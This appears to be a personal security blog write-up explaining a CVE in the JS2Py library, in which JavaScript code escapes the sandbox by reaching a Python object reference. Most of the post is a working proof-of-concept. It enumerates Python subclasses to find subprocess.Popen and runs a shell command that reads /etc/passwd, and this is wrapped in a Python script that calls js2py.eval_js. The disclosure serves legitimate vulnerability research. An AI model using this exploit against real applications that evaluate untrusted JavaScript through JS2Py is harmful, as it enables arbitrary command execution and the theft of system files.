7f454c4648656c7
f454 ,aoooooooa, c464
8656 ,oY" c6c6f2c "Yo, 2077
0100 ,oY 000003003e0 Yo, 00c0
0000 oo 0000000000c00 oo 0000
0c00 oo 0000 N0X 0000 oo 0000
0f05 oo 5f3cf4ff711fb oo 20e1
400e `ob b0638000100 do' 1500
ff71 `oba da545e0 ado' f05b
0e73 "YoooooooY" 1ffe
bdf6f726c64210a
[main] [about me] [writeups] Made with ❤ by n0x
------ Vulnerability ------------------------------------------------------
This CVE was found by cybersecurity researcher Marven11.
Some global variables are available in the environment provided by
JS2Py, one of which exposes a reference to a Python object, allowing you
to escape the JS environment and go back into the structure of the Python
object.
The Javascript code for retrieving the Python object reference is as
follows:
.-------------------------------------------------------------------------.
| Object |
| . getOwnPropertyNames ( {} ) |
| . __getattribute__ ( "__getattribute__" ) ( "__class__" ) |
| . __base__ |
'-------------------------------------------------------------------------'
From this code, we can enumerate the subclasses to access the libraries of
the Python Standard Library.
.-------------------------------------------------------------------------.
| // Retrieving the reference |
| let pyref = Object |
| . getOwnPropertyNames ( {} ) |
| . __getattribute__ ( "__getattribute__" ) ( "__class__" ) |
| . __base__ |
| |
| for ( let i in pyref. __subclasses__ () ) { |
| let item = pyref. __subclasses__ ()[ i] |
| // If the subclass is the Popen function of the subprocess module |
| if (item. __module__ == "subprocess" && item. __name__ == "Popen" ) { |
| // Executing a command and retrieving its return |
| res = item ( |
| "head -n 1 /etc/passwd" , |
| - 1, |
| null , |
| - 1, |
| - 1, |
| - 1, |
| null , |
| null , |
| true |
| ) .communicate () |
| |
| console .log ( res) |
| } |
| } |
'-------------------------------------------------------------------------'
------ POC ----------------------------------------------------------------
.-------------------------------------------------------------------------.
| import js2py |
| |
| payload = """ |
| let cmd = "head -n 1 /etc/passwd" |
| |
| // Retrieving the reference |
| let pyref = Object |
| . getOwnPropertyNames ( {} ) |
| . __getattribute__ ( "__getattribute__" ) ( "__class__" ) |
| . __base__ |
| |
| for ( let i in pyref. __subclasses__ () ) { |
| let item = pyref. __subclasses__ ()[ i] |
| // If the subclass is the Popen function of the subprocess module |
| if (item. __module__ == "subprocess" && item. __name__ == "Popen" ) { |
| // Executing a command and retrieving its return |
| res = item ( |
| "head -n 1 /etc/passwd" , |
| - 1, |
| null , |
| - 1, |
| - 1, |
| - 1, |
| null , |
| null , |
| true |
| ) .communicate () |
| |
| console .log ( res) |
| } |
| } |
| """ |
| |
| def main () : |
| try : |
| result = repr ( js2py.eval_js ( payload) ) |
| except Exception : |
| return False |
| |
| if __name__ == "__main__" : |
| main () |
'-------------------------------------------------------------------------'
___________________________________________________________________________
[X] [github] [hackthebox] [root-me] [tryhackme] [ctftime]
I also do some photograhy (pcb/die, animals, landscapes, etc).
Feel free to check my Gurushots and Flickr profile